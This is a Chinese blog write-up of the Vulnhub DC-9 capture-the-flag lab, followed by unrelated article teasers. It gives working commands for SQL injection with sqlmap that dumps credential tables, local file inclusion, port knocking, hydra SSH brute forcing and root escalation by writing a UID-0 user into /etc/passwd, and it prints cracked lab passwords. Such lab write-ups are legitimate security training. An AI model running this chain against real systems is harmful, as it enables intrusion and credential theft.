Vulnhub靶场DC-9

攻击机192.168.223.128
靶机192.168.223.138
主机发现 nmap -sP 192.168.223.0/24
在这里插入图片描述

端口扫描 nmap -sV -p- -A 192.168.223.138
在这里插入图片描述

开启了22 80端口
访问一下web页面
在这里插入图片描述

有个查询界面
在这里插入图片描述

测试发现存在post型的sql注入
在这里插入图片描述

用sqlmap跑一下,因为是post型的,这里加一个post的data
sqlmap -u http://192.168.223.138/results.php --data "search=1" --dbs 爆库
在这里插入图片描述

三个库,看一下users的

 sqlmap -u http://192.168.223.138/results.php --data "search=1" --tables -D users --batch

只有一个表
在这里插入图片描述

看一下字段

sqlmap -u http://192.168.223.138/results.php --data "search=1" --columns -D users  -T UserDetails --batch

在这里插入图片描述

有账号密码
看一下账号密码

sqlmap -u http://192.168.223.138/results.php --data "search=1" -C username,password -D users  -T UserDetails --dump

在这里插入图片描述

账号密码都爆出来了,登录一下
在这里插入图片描述

等一下这个管理员的账号,md登不上去0.0
测试了其他账号密码也登不上去,我淦
还有一个库没看Staff
sqlmap -u http://192.168.223.138/results.php --data "search=1" --tables -D Staff --batch爆表

在这里插入图片描述

也有个Users

sqlmap -u http://192.168.223.138/results.php --data "search=1" --columns -D Staff -T Users --batch爆字段
在这里插入图片描述

有账号密码

sqlmap -u http://192.168.223.138/results.php --data "search=1" -C Username,Password -D Staff -T Users --dump --batch

在这里插入图片描述

admin 856f5de590ef37314e7c3bdf6f8a66dc
密码用md5解密看看
在这里插入图片描述

密码是transorbital1
在这里插入图片描述

成功登录
注意下面显示
在这里插入图片描述

可能有文件包含
用bp抓包看看
在这里插入图片描述

并没有什么参数,根据前面有个靶机的经验,文件包含的参数名可能是file
测试一下
在这里插入图片描述

成功LFI
BUT,后面不会了,尝试了ssh连接也无果。
看了别人wp后才知道靶机开启了knockd服务
搜索了一下相关知识
在这里插入图片描述

在第一步信息收集的时候22端口其实状态是被过滤的,我忽略了这一点
在这里插入图片描述

重新看一下,也验证了靶机开启了knockd服务
看一下配置文件,默认配置文件在/etc/knockd.conf
在这里插入图片描述

其中7469,8475,9842 就是我们敲门的端口序列
用nmap依次访问22端口就会开启

nmap -p 7469 192.168.223.138
nmap -p 8475 192.168.223.138
nmap -p 9842 192.168.223.138

在这里插入图片描述

在扫一下端口看看22端口开没开
在这里插入图片描述

这里看到22端口已经开启了
那么应该就可以用ssh连接了
为了方便,把之前获得的账号和密码分别放入两个txt文档用hydra爆破一下,省手输入了

hydra -L users.txt -P password.txt ssh://192.168.223.138

爆出来三组账号密码

在这里插入图片描述

login: chandlerb password: UrAG0D!
login: joeyt password: Passw0rd
login: janitor password: Ilovepeepee

ssh chandlerb@192.168.223.138
ssh joeyt@192.168.223.138
ssh janitor@192.168.223.138

先登第一个看看,空的
看第二个,也是空的
看第三个,也是空的,
我擦
难道是隐藏了

ls -a 看一下

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

看到janitor账户多一个文件
在这里插入图片描述

打开发现里面有个密码文件
可能是其他账户密码,加到字典里再爆破一次
在这里插入图片描述

多爆破出来一组fredf!login: fredf password: B4-Tru3-001
我最初怀疑的管理员!管理员总应该有点root权限吧?
sudo -l 看一下
在这里插入图片描述

果然有一个免密rooot
打开这个文件看一下
在这里插入图片描述

好多编译文件,不知道如何利用,看看上一级test.py是什么东西
在这里插入图片描述

是一个文件读写的脚本,读取第一个参数文件的内容,写入到第二个参数文件里
可以利用这个脚本写一个有root权限的用户到/etc/passwd就可以提权了
先来到tmp目录写一个免密的root

echo ttao::0:0:root:/bin/bash >>/tmp/mr

然后执行test
sudo ./test /tmp/mr /etc/passwd发现不太行,可能是文件权限稳定,暂时没搞懂
那就弄个加密的root
用openssl加盐

openssl passwd -1 -salt xt xt

1 1 1xt$Mpdxuy7oTO65ufaQVL4zS1
在这里插入图片描述

echo 'echo 'xt:$1$xt$Mpdxuy7oTO65ufaQVL4zS1:0:0:root:/bin/bash' >> /tmp/xt
' >> /tmp/xt
sudo ./test /tmp/xt /etc/passwd

su xt
在这里插入图片描述

成功拿下flag。
1.sql注入2.LFI本地包含3.knockd敲门服务4.ssh连接5.hyrdra爆破6.ls -a读取隐藏文件7.openssl生成加盐密码8.写入root权限用户

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/652758.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

用于不对称卷积的验证参数的小程序

非对称卷积的特征图尺寸计算 此处只例举输入图像是正方形的情况。设输入图像尺寸为WxW,卷积核尺寸为ExF,步幅为S,Padding为P,卷积后的特征图尺寸为: 矩形卷积 如果输入图像是正方形,尺寸为WxW&#xff0c…

C++二叉搜索树详解

文章目录 1. 前言2. 二叉搜索树的概念3. 二叉搜索树的操作4. 二叉搜索树的实现5. 二叉搜索树的应用6. 二叉搜索树的性能分析 1. 前言 当涉及到组织和管理数据时,二叉搜索树是一种常用的数据结构。它不仅可以快速插入和删除元素,还可以高效地搜索和查找特…

Elasticsearch安装Head图形插件

一、Google浏览器扩展插件方式 1.安装插件 进入谷歌浏览器应用商店搜索“Elasticsearch Head”,点击链接跳转 点击“添加至Chrome”按钮安装即可。 2.使用插件 在浏览器的插件列表多了个一个放大镜图标 点击“New”新建链接,输入es节点或集群地址。 连接成功 可以进行概括…

windows CUDA更新(最简单方法)+虚拟环境torch和cuda安装

目录 一、Torch和对应cuda安装 1、查看本身电脑的cuda版本 2、查找对应cuda——torch——python版本 3、安装cuda 4、安装torch 二、window 10 NVIDIA cuda版本更新 一、Torch和对应cuda安装 项目使用torch想要使用GPU运行,但是报错,记录一下解决…

扭蛋机小程序开发:探索用户体验与商业价值的融合

一、引言 随着移动互联网的快速发展,小程序作为一种新型的应用形态,正逐渐改变着人们的生活方式。扭蛋机小程序便是其中一例,它结合了线上线下的互动体验,为用户带来了全新的娱乐方式。本文将探讨扭蛋机小程序的开发过程&#xf…

初见CodeQL

安装CodeQL CodeQL本身包含两部分解析引擎SDK 下载已经编译好的 CodeQL 执行程序 https://github.com/github/codeql-cli-binaries/releases 下载之后配置环境变量 安装 SDK CMD 进入 CodeQL 安装目录,使用 Git 安装 SDK git clone https://github.com/Semmle/ql安…

Vulnhub-dc6

信息收集 # nmap -sn 192.168.1.0/24 -oN live.port Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-25 14:39 CST Nmap scan report for 192.168.1.1 Host is up (0.00075s latency). MAC Address: 00:50:56:C0:00:08 (VMware) Nmap scan report for 192.168.1.2…

JAVA多线程并发学习记录

基础知识 1.进程和线程 线程是最小的调度单位,进程是最小的资源分配单位 进程:当程序从磁盘加载到内存中这时就开启了一个进程,进程可视为程序的一个实例。大部分程序可以同时运行多个实例。 线程:线程是进程的一个子集&#…

机器学习第一个项目-----鸢尾花数据集加载及报错解决

项目步骤 如刚开始做,从 “项目开始” 看; 如遇到问题从 “问题” 开始看; 问题 报错如下 ModuleNotFoundError: No module named sklearn解决过程 查看官网,感觉可能是python版本和skilearn版本不匹配,更新一下p…

Spring MVC 请求流程

SpringMVC 请求流程 一、DispatcherServlet 是一个 Servlet二、Spring MVC 的完整请求流程 Spring MVC 框架是基于 Servlet 技术的。以请求为驱动,围绕 Servlet 设计的。Spring MVC 处理用户请求与访问一个 Servlet 是类似的,请求发送给 Servlet&#xf…

【vue3】Vue3 + Vite 项目搭建

Vue3 Vite 项目搭建 创建项目添加Vue Router 4路由配置添加Vant UI 组件库移动端rem适配添加iconfont字体图标库二次封装Axios请求库添加CSS预处理器Less添加全局状态管理插件Vuex 1.创建项目 Vite方式 1.1 进入开发目录, 执行指令创建新项目 更行node版本18 npm 7.x版本 su…

ThinkPhp3.2(qidian)部署文档

宝塔环境部署 申请域名以及域名解析 具体配置,可百度之 在宝塔面板中创建网站 上传代码导入数据配置运行目录 注意:(如果版本:thinkphp3.2 )配置 运行目录要特别注意:运行目录要选择根目录“/”&#xff…

什么是数据库的三级模式两级映象?

三级模式两级映象结构图 概念 三级模式 内模式:也称为存储模式,是数据物理结构和存储方式的描述,是数据在数据库内部的表示方式。定义所有的内部记录类型、索引和文件组织方式,以及数据控制方面的细节。模式:又称概念…

计算机今年炸了,究竟炸到什么程度呢❓

小兄弟,计算机哪年不爆炸啊! 尤其是19年,20年,21年,可以说是计算机最卷的几年,这几年也刚好是互联网企业风头正盛的几年 从这里大家可以看出来,任何一个行业都有他的周期,任何一个专…

中等题 ------ 数组以及字符串

以前刷的都是一些简单题,从一些基本的数据结构到算法,得有400多道了,简单题就先这样吧,从今天以后就开始着手中等题和困难题了。 做了一些中等题,感觉确实和简单题没法比,简单题有些直接模拟,暴…

vue3框架基本使用

一、安装包管理工具 vite和vue-cli一样,都是脚手架。 1.node版本 PS E:\vuecode\vite1> node -v v18.12.12.安装yarn工具 2.1 yarn简单介绍 yarn是一个包管理工具,也是一个构建、打包工具 yarn需要借助npm进行安装:执行的命令行npm i…

linux安装docker-compose

前言 如果你的docker版本是23,请移步到linux安装新版docker(23)和docker-compose这篇博客 查看docker版本命令: docker --version今天安装docker-compose的时候,找了很多教程,但是本地一直报错&#xff0…

c++学习第十三讲---STL常用容器---string容器

string容器: 一、string的本质: string和char*的区别: char*是一个指针 string是一个类,封装了char*,管理这个字符串,是char*的容器。 二、string构造函数: string() ; …

C#常见内存泄漏

背景 在开发中由于对语言特性不了解或经验不足或疏忽,往往会造成一些低级bug。而内存泄漏就是最常见的一个,这个问题在测试过程中,因为操作频次低,而不能完全被暴露出来;而在正式使用时,由于使用次数增加&…

STM32之IIC总线控制ATC24C04

一、存储器介绍 1、电子密码存储概述 单片机的电子密码存储是一种将密码信息以电子形式存储在单片机内部的技术。它通常用于需要保护敏感信息或限制访问权限的应用程序,如安全系统、门禁系统、电子锁等。 电子密码存储可以通过多种方式实现,以下是其中…